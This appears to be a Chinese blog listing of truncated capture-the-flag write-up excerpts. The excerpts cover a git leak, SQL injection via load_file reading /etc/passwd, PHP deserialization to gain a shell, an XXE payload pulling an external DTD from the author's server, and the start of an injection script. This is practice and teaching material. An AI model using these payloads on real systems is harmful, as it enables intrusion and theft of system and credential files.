2019年12月13日
git泄露python GitHack.py http://xxxxxxxx/.git根据提示去猜解爆破即可user:zhangwei pass:zhangwei666代码审计后发现注入点查询/etc/passwd : ',content=(select load_file('//etc/passwd')),/*闭合查询语句得到结果以此方法继续查询/bin/bash_history : ',content=(select loa
2019年12月13日
官方writeupposturl=data://baidu.com/plain;base64,bjNrMA==看不懂
2019年12月13日
这里首先想到的就是上传木马,但是经过尝试只能上传图片马,并且不能直接利用,经过抓包发现cookie是序列化内容,所以应该是通过cookie传递序列化内容,经过服务器的反序列化,然后对图片进行重命名操作,进而获得shell生成序列化cookie<?php
class Profile
{
public $checker = 0;
public&nb
2019年12月13日
根据题目提示是java xxe,先测试出xxe所在位置为xlsx的[Content_Types].xml文件先使用xxe读取目录payload放到excel里面<!DOCTYPE ANY[
<!ENTITY % send SYSTEM 'http://www.liugongrui.com/ctf/xxe/test.dtd'>
%send;
%test;
%back;
]>test.dtd 放到自己
2019年12月13日
注入脚本:# coding=utf-8
import re
import requests
import sys
import binascii
import json
reload(sys)
sys.setdefaultencoding("utf8")
url = "http://182.92.220.157:11116/index.php?r=Login/Logi